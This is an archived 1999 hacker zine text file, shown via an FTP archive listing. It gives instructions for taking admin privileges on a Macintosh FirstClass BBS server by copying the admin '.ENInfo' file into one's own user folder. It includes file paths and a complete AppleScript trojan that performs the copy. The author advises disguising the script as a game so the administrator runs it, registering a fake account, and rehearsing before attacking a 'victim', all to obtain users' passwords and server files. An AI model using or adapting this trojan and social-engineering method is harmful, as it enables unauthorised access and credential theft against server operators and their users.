home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / Happle09.sit / Happle#08 / Happle Issue#09.rsrc / TEXT_134.txt < prev    next >
Text File  |  1999-02-26  |  4KB  |  98 lines
  1.  
  2.  
  3.  
  4. FirstClass Client Admin Privs Hack
  5.  
  6. By BigBrother
  7. <tdurie@idirect.ca>
  8.  
  9.  
  10. Description
  11.  
  12. The following document will show you how to give yourself admin privs on a FirstClass BBS. This works on a Macintosh FirstClass Server, I am not sure if it works on a Windows Server. 
  13.  
  14. To give yourself admin privs on a FirstClass Server all you need to do is to copy the file ".ENInfo" from the admin folder in the FirstClass Post Office to your user folder in the FirstClass Post Office. Once you have done this, when you log onto the server you will have to admins desktop. You can then access the servers hard drive and download all the users passwords on the server plus all the files on the server hard drive plus on any connected devices.
  15.  
  16.  
  17. File Paths
  18.  
  19. The file ".ENInfo " is located at:
  20.  
  21. (Hard Drive):FirstClass Post Office:UserDir:Admin:.ENInfo
  22.  
  23. Your user folder is located at:
  24.  
  25. Hard Drive: FirstClass Post Office: UserDir: 0_: (Your Alias on the Server)
  26.  
  27. or
  28.  
  29. Hard Drive: FirstClass Post Office: UserDir: 1_: (Your Alias on the Server)
  30.  
  31. (Location of your user folder differs with the type of account you have)
  32.  
  33. How To Move The File
  34.  
  35. How to accomplish moving the".ENInfo " file to your user folder:
  36.  
  37. 1. If you have physical access to the servers computer you can just drag and copy (hold down option while dragging the file) the ".ENInfo" file from the "admin" folder to your user folder which is in the "0_" or "1_" folder. (If you plan in advance you could make a bogus account by auto-registering under a fake name. You could then drag the file to this bogus account.)
  38.  
  39. 2. If the above method doesn't work because you don't have physical access to the  server you can try this Trojan.(Mac Only) This is an application that moves the ".ENInfo" file from the admin folder to your user directory. You can disguise this script as another type of application so that the admin doesn't realise that his server has just been tampered with. (This script will only work on a macintosh with System 7.5 and up that has the "Scriptable Finder Extension" installed aswell as the applescript extension installed. Luckily this is the standard configuration of most macintosh machines after system installation or right out of the box.
  40.  
  41. Copy the following script into the applescript "script editor" and save it as a "run only" program. Disguise it by changing the Icon and the name it.
  42.  
  43. -- Script Starts Here
  44.  
  45. tell application "Finder"
  46.         activate
  47.  
  48. -- put your user id in xxxx on the next line.  ex: John Smith
  49.  
  50. delete file ".ENInfo" of folder "xxxx"of folder"1_" of folder "UserDir" of
  51. folder "FirstClass Post Office" of startup disk
  52. empty trash
  53.  
  54. -- put you user id in xxxx on the next line.  ex: John Smith
  55.  
  56. delete file ".ENInfo" of folder "xxxx"of folder"0_" of folder "UserDir" of
  57. folder "FirstClass Post Office" of startup disk
  58. empty trash
  59.  
  60. try
  61.  
  62. -- put you user id in xxxx on the next line.  ex: John Smith
  63.  
  64. delete file ".ENInfo" of folder "xxxx" of folder "0_" of folder "UserDir"
  65. of folder "FirstClass Post Office" of startup disk
  66.  
  67. copy file ".ENInfo" of folder "Admin" of folder "UserDir" of folder
  68. "FirstClass Post Office" of startup disk to folder "xxxx" of folder "1_" of
  69. folder "UserDir" of folder "FirstClass Post Office" of startup disk
  70.  
  71. on error
  72. end try
  73. try
  74.  
  75. -- put you user id in xxxx on the next line. ex: John Smith
  76.  
  77. copy file ".ENInfo" of folder "Admin" of folder "UserDir" of folder
  78. "FirstClass Post Office" of startup disk to folder "xxxx" of folder "0_" of
  79. folder "UserDir" of folder "FirstClass Post Office" of startup disk
  80.  
  81. on error
  82. end try
  83. end tell
  84.  
  85. -- Script ends here
  86.  
  87. You can either upload this script to the server or put it on a disk and run it when you are directly on the server computer. If you upload it to the server make sure that it is disguised as something that the admin is interested in, such as a game or neat program. This will ensure that the admin will download it and launch the application.
  88.  
  89. You should test the script out on the demo server before trying this, just in case the script needs to be configure a bit differently. If you know somebody who has the real server try it out on their server before you try it on your victim.
  90.  
  91. If anybody wants to program a version of the above script please send me a copy of the hack.
  92.  
  93. This script worked for me it may not for you, but anyway, I take no responsibility for the use of this information.
  94.  
  95. By BigBrother
  96. <tdurie@idirect.ca>
  97.  
  98.